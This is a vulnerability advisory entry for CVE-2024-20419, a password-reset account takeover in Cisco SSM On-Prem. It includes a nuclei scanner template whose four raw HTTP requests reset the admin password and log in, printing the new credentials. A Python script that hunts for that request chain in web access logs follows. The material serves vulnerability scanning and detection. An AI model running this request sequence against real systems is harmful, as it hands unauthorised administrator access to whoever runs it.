
Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover

03 Jun 2026 06:04:49 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

A vulnerability in Cisco SSM On-Prem <= 8-202206 allows unauthenticated remote attackers to change user passwords, leading to account takeover. Exploiting this flaw grants access to the web UI and API with the privileges of the compromised user.

id: CVE-2024-20419

info:
  name: Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.
  reference:
    - https://www.0xpolar.com/blog/CVE-2024-20419
    - https://nvd.nist.gov/vuln/detail/CVE-2024-20419
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
    - https://www.secpod.com/blog/critical-flaw-in-ciscos-secure-email-gateways-allows-attackers-to-control-the-device-completely/
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-20419
    cwe-id: CWE-620
    epss-score: 0.91469
    epss-percentile: 0.99682
  metadata:
    fofa-query: title="On-Prem License Workspace"
    verified: true
    max-request: 4
  tags: cve,cve2024,cisco,on-prem,ssm,intrusive,account-takeover,vkev,vuln

flow: http(1) && http(2) && http(3) && http(4)

variables:
  username: "admin"
  string1: "{{to_upper(rand_text_alphanumeric(7))}}"
  string2: "{{to_lower(rand_text_alphanumeric(7))}}"
  password: "{{string1}}{{string2}}!"

http:
  - raw:
      - |
        GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - 'enabled'
          - 'redirect'
        condition: and
        internal: true

  - raw:
      - |
        POST /backend/reset_password/generate_code HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}

        {"uid": "admin"}

    matchers:
      - type: word
        words:
          - 'uid'
          - 'auth_token'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: auth_token
        json:
          - ".auth_token"
        internal: true

  - raw:
      - |
        POST /backend/reset_password HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}

        {"uid": "admin","auth_token":"{{auth_token}}", "password":"{{password}}","password_confirmation":"{{password}}","common_name":""}

    matchers:
      - type: word
        words:
          - '"status":"OK"'
        condition: and
        internal: true

  - raw:
      - |
        POST /backend/auth/identity/callback HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers:
      - type: word
        part: body
        words:
          - 'session_key'
          - 'role'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 4a0a004730450220035242c1a4ccd69a5cf62f07eef169bcdfbbbc8656a21e42ac413ab1f4724be5022100f1691e7c1941a7dbda394d6af752623050cc0e33fe93f6ef1064db5196592d43:922c64590222798bb761d5b6d8e72950
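
For defenders, the request sequence in the template above can be hunted for in web access logs. The following is an added example, not part of the template or of any ProjectDiscovery or Cisco code: it correlates, per client address, successful POSTs to the three backend paths the template uses. The combined access-log layout, the five-minute window and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Paths of the template's three state-changing requests, in order.
CHAIN = ["/backend/reset_password/generate_code",
         "/backend/reset_password",
         "/backend/auth/identity/callback"]
WINDOW = timedelta(minutes=5)  # assumed correlation window

# Assumed layout: combined access-log format, e.g. from a fronting proxy.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Jun/2026:06:00:01 +0000] "GET /backend/settings/oauth_adfs?hostname=x HTTP/1.1" 200 41
198.51.100.7 - - [03/Jun/2026:06:00:02 +0000] "POST /backend/reset_password/generate_code HTTP/1.1" 200 96
198.51.100.7 - - [03/Jun/2026:06:00:02 +0000] "POST /backend/reset_password HTTP/1.1" 200 15
198.51.100.7 - - [03/Jun/2026:06:00:03 +0000] "POST /backend/auth/identity/callback HTTP/1.1" 200 310
203.0.113.20 - - [03/Jun/2026:07:10:00 +0000] "POST /backend/auth/identity/callback HTTP/1.1" 200 305
203.0.113.21 - - [03/Jun/2026:08:00:00 +0000] "POST /backend/reset_password/generate_code HTTP/1.1" 200 96
203.0.113.21 - - [03/Jun/2026:08:30:00 +0000] "POST /backend/reset_password HTTP/1.1" 200 15
"""

def find_reset_chains(log_text, window=WINDOW):
    """Return (client, stage, chain_start); stage 2 = reset done, 3 = login followed."""
    progress = {}  # client -> (index of next expected path, time the chain began)
    hits = {}      # client -> (highest stage reached, time the chain began)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        client, ts, method, target, status = m.groups()
        if method != "POST" or not status.startswith("2"):
            continue
        path = target.split("?", 1)[0].rstrip("/")
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        step, began = progress.get(client, (0, when))
        if step and when - began > window:
            step, began = 0, when          # stale chain: start over
        if path == CHAIN[0]:
            step, began = 1, when          # code generation starts a chain
        elif step and path == CHAIN[step]:
            step += 1
            hits[client] = (step, began)   # reset (2) or reset plus login (3)
        else:
            continue
        progress[client] = (step % len(CHAIN), began)
    return sorted((c, s, t.isoformat()) for c, (s, t) in hits.items())
```

A hit is a lead for triage: the access log carries no response body, so it cannot show whether the reset returned the `"status":"OK"` that the template matches on.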
